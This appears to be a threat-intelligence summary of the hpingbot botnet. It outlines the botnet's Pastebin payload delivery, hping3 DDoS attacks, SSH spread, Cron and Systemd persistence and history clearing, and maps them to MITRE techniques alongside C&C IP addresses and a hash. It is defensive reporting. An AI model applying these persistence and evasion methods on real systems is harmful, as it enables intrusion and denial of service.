Threat Research

Hpingbot Distributing Malware Via Pastebin

Securonix
Hpingbot Distributing Malware Via Pastebin

A new cross-platform botnet family named hpingbot, developed in Go language, is rapidly spreading and evolving with capabilities to launch DDoS attacks using the hping3 tool and distribute arbitrary payloads via Pastebin. The botnet shows strong innovation with independent propagation modules, multiple persistence mechanisms, and frequent updates, posing a significant threat as a potential long-term malware operation with risks of distributing advanced threats like ransomware or APT components. #hpingbot #hping3 #Pastebin

Keypoints

  • Hpingbot is a newly discovered botnet family developed in Go, supporting Windows and Linux/IoT with multi-architecture versions (amd64, mips, arm, 80386).
  • The botnet leverages the online text-sharing platform Pastebin for flexible payload distribution and uses the network testing tool hping3 to launch various types of DDoS attacks.
  • Hpingbot’s Windows version cannot directly use hping3 but remains highly active, suggesting a focus on downloading and executing arbitrary payloads beyond DDoS.
  • It employs independent SSH propagation modules, multiple persistence methods (Systemd, SysVinit, Cron), and trace cleaning to avoid detection.
  • The attacker frequently updates C&C servers and Trojan versions, indicating a professional development effort and potential for long-term operation.
  • Hpingbot has been used to perform DDoS attacks primarily targeting Germany, the US, and Turkey, with a focus on stealth and reduced operational cost.
  • New DDoS components distributed through hpingbot show ongoing attacker testing and potential replacement or supplementation of original botnet capabilities.

MITRE Techniques

  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Used to execute attack tools and system architecture detection via Shell scripts (‘Execute attack tool deployment and system architecture detection through Shell scripts’).
  • [T1569.002] System Services: Service Execution – Utilized in managing system services for persistence (‘Combine system services (Systemd/SysVinit) with scheduled tasks (Cron) to achieve a persistence mechanism’).
  • [T1543.002] Create or Modify System Process: Systemd Service – Used to create service unit files for botnet persistence (‘Create a service unit file, set the boot self-start and start the service’).
  • [T1037.004] Boot or Logon Initialization Scripts: RC Scripts – Implemented for persistence (‘Create an init script and enable autostart with update-rc.d or chkconfig’).
  • [T1053.003] Scheduled Task/Job: Cron – Cron jobs set to run on restart to maintain persistence (‘Set to run on restart via the @reboot rule’).
  • [T1070.004] Indicator Removal: File Deletion – File self-deletion after execution to avoid detection (‘Perform file self-deletion after execution to avoid detection’).
  • [T1070.003] Indicator Removal: Clear Command History – Clearing command history to evade tracking (‘Clear command history’).
  • [T1102.002] Web Service: Pastebin – Pastebin is used to host malicious payloads for flexible distribution (‘Use Pastebin platform to host malicious payloads’).
  • [T1095] Non-Application Layer Protocol – hping3 used to launch DDoS attacks at the network layer (‘Deploy hping3 to launch DDoS attacks’).
  • [T1008] Fallback Channels – Use of multiple C&C servers and update commands for resilience (‘Frequent replacement of C&C servers’).
  • [T1498] Network Denial of Service – Launching various DDoS attack types using hping3 with custom parameters (‘DDoS attack instructions executed by calling hping3 with specified parameters’).
  • [T1082] System Information Discovery – Detecting system architecture for adaptive payload deployment (‘Architecture identification to generate corresponding file names’).
  • [T1588.001] Acquire Tool: Software – Installation of hping3 via package managers for attack purposes (‘Hpingbot downloads and installs hping3 by executing the command apt -y install hping3’).
  • [T1588.006] Acquire Infrastructure: Web Services – Use of Pastebin and controlled nodes for infrastructure supporting payload delivery (‘Uses Pastebin and controlled nodes to distribute other components’).

Indicators of Compromise

  • [IP Addresses] Attack targets and C&C infrastructure – 45.139.113.61, 193.32.162.210
  • [Domains/URLs] Payload hosting and distribution – http://128.0.118.18, http://93.123.118.21, http://94.156.181.41
  • [File Hashes] Sample malware identification – F33E6976E3692CB3E56A4CC9257F5AAE
  • [IP Addresses] Victim of multiple DDoS attacks used for testing – 79.*.*.212 (partial)

Read more: https://nsfocusglobal.com/hpingbot-a-new-botnet-family-based-on-pastebin-payload-delivery-chain-and-hping3-ddos-module/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint